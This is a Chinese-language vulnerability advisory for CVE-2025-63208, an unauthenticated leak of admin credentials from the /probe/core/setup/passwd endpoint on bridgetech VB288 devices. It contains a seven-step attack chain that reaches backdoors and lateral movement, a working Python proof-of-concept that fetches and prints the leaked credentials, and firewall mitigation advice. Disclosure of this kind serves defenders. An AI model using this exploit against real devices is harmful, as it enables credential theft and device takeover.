CVE-2025-63208: bridgetech VB288信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-63208

漏洞类型

信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

bridgetech VB288 Objective QoE Content Extractor

漏洞概述

CVE-2025-63208是bridgetech公司开发的VB288 Objective QoE Content Extractor设备中存在的一个高危信息泄露漏洞。该漏洞影响固件版本5.6.0-8，攻击者无需任何认证即可通过访问特定的API端点获取系统敏感信息。漏洞主要危害在于未经授权即可访问管理员密码等关键凭据，攻击者利用获取的凭据可以进一步控制整个设备，对企业网络安全造成严重威胁。此类信息泄露漏洞属于OWASP Top 10中的敏感数据泄露类别，在物联网设备中尤为常见且危险。由于该漏洞无需认证即可利用，且可通过网络远程触发，因此具有极高的实际威胁性。

技术细节

该漏洞存在于bridgetech VB288设备的Web管理界面中，具体位于/probe/core/setup/passwd端点。该端点在设计实现时未对访问权限进行适当验证，导致任何网络可达的用户均可直接访问并获取管理员账户的密码哈希值。攻击者只需构造特定的HTTP请求即可触发漏洞，无需提供任何身份凭证。获取的管理员密码可用于登录设备管理后台，进一步进行配置修改、固件升级或其他恶意操作。从安全架构角度看，该设备在身份验证和访问控制方面存在设计缺陷，未遵循最小权限原则，且敏感接口缺乏必要的认证检查。攻击者还可以利用获取的凭据进行横向移动，渗透内网其他系统。

攻击链分析

STEP 1

步骤1: 侦察阶段

攻击者对目标网络进行扫描，发现运行bridgetech VB288固件版本5.6.0-8的设备，确认目标开放Web管理端口

STEP 2

步骤2: 漏洞探测

攻击者构造HTTP GET请求访问/probe/core/setup/passwd端点，无需提供任何认证凭据

STEP 3

步骤3: 信息获取

目标设备响应请求，返回包含管理员账户和密码哈希的敏感信息

STEP 4

步骤4: 密码破解

攻击者对获取的密码哈希进行离线破解或直接使用明文密码（如未加密存储）

STEP 5

步骤5: 权限提升

使用获取的管理员凭据登录设备管理后台，获取完全控制权

STEP 6

步骤6: 持久化控制

在设备上部署后门、修改配置或进行固件篡改，实现长期持久化控制

STEP 7

步骤7: 横向移动

以被控设备为跳板，攻击内网其他系统或数据，进行进一步渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-63208 PoC - Information Disclosure in bridgetech VB288
# Target: /probe/core/setup/passwd endpoint

target_ip = "192.168.1.100"  # Replace with target IP
target_port = 8080

url = f"http://{target_ip}:{target_port}/probe/core/setup/passwd"

print(f"[*] Exploiting CVE-2025-63208 on {target_ip}")
print(f"[*] Target URL: {url}")

try:
    # Send unauthenticated request to leak admin credentials
    response = requests.get(url, timeout=10)
    
    print(f"[*] Status Code: {response.status_code}")
    
    if response.status_code == 200:
        print("[+] SUCCESS: Sensitive information leaked!")
        print("\n[+] Leaked Data:")
        print(response.text)
        
        # Parse and display credentials if possible
        try:
            data = response.json()
            print("\n[+] Parsed Credentials:")
            print(json.dumps(data, indent=2))
        except:
            print("\n[+] Raw Response:")
            print(response.text)
    else:
        print(f"[-] Failed: Status code {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

bridgetech VB288 Objective QoE Content Extractor 固件版本 5.6.0-8

防御指南

临时缓解措施

立即在网络边界防火墙上阻断对/probe/core/setup/passwd端点的外部访问；如业务需要远程管理，应通过VPN或专用管理通道访问；启用设备的安全日志功能，监控所有管理接口的访问记录；暂时禁用非必要的远程管理功能，待厂商发布修复补丁后尽快升级。